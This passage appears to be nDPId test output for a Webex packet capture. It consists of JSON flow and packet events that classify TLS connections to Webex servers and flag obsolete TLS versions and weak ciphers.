{"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669736,"flow_last_seen":1444570669736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669736,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1444570669736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669736,"pkt":"ABoRAAACABoRAAABCABFAAA80OhAAEAGQOUKCAABPm3geMfSAbvlsh8HAAAAAKACOQhHhwAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1444570669745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAAoAiJAABAGP8A+beB4CggAAQG7x9IaTeD45bIfCFAS\/\/+9VQAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669745,"flow_last_seen":1444570669745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669745,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1444570669745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAA8QwJAAEAGzssKCAABPm3geMfTAbvSW4ztAAAAAKACOQjs9gAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1444570669760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAoAiNAABAGP78+beB4CggAAQG7x9MtpHMS0luM7lAS\/\/+9VAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1444570669760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAo0OlAAEAGQPgKCAABPm3geMfSAbvlsh8IGk3g+VAQOQiETgAA"} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1444570669762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669762,"pkt":"ABoRAAACABoRAAABCABFAAAoQwNAAEAGzt4KCAABPm3geMfTAbvSW4zuLaRzE1AQOQiETQAA"} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570672215,"flow_last_seen":1444570672215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570672215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1444570672215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570672215,"pkt":"ABoRAAACABoRAAABCABFAAA8MYhAAEAGVYAKCAABQERpZ6HLAbsAQeF1AAAAAKACOQgEvgAAAgQFtAQCCAoATND9AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1444570672219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoAjpAABAGtOJARGlnCggAAQG7ocv\/vh6KAEHhdlAS\/\/9YlwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1444570672219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoMYlAAEAGVZMKCAABQERpZ6HLAbsAQeF2\/74ei1AQOQgfkAAA"} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570674487,"flow_last_seen":1444570674487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570674487,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1444570674487,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570674487,"pkt":"ABoRAAACABoRAAABCABFAAA8CB5AAEAGejQKCAABrfMAbtlxAbui3tn8AAAAAKACOQgsWAAAAgQFtAQCCAoATNHiAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1444570674499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674499,"pkt":"ABoRAAACABoRAAABCABFAAAoAklAABAGsB2t8wBuCggAAQG72XFdISYDot7Z\/VAS\/\/8cOwAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1444570674500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674500,"pkt":"ABoRAAACABoRAAABCABFAAAoCB9AAEAGekcKCAABrfMAbtlxAbui3tn9XSEmBFAQOQjjMwAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570675941,"flow_last_seen":1444570675941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570675941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1444570675941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570675941,"pkt":"ABoRAAACABoRAAABCABFAAA8SaRAAEAGwwMKCAABPm3lnsp5AbteGJvVAAAAAKACOQhIBAAAAgQFtAQCCAoATNJxAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1444570675945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675945,"pkt":"ABoRAAACABoRAAABCABFAAAoAm5AABAGOk4+beWeCggAAQG7ynmh52QqXhib1lAS\/\/+1iAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1444570675946,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675946,"pkt":"ABoRAAACABoRAAABCABFAAAoSaVAAEAGwxYKCAABPm3lnsp5AbteGJvWoedkK1AQOQh8gQAA"} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570679512,"flow_last_seen":1444570679512,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570679512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1444570679512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570679512,"pkt":"ABoRAAACABoRAAABCABFAAA8dLdAAEAGDZsKCAABrfMAbtl1Abugj6duAAAAAKACOQhfOgAAAgQFtAQCCAoATNPZAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1444570679516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAoAphAABAGr86t8wBuCggAAQG72XVfcFiRoI+nb1AS\/\/8cNwAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1444570679516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAodLhAAEAGDa4KCAABrfMAbtl1Abugj6dvX3BYklAQOQjjLwAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"thread_ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570693238,"flow_last_seen":1444570693238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570693238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1444570693238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570693238,"pkt":"ABoRAAACABoRAAABCABFAAA8LOJAAEAGVXAKCAABrfMAbtl3AbsPD\/XWAAAAAKACOQic9QAAAgQFtAQCCAoATNk0AAAAAAEDAwY="} 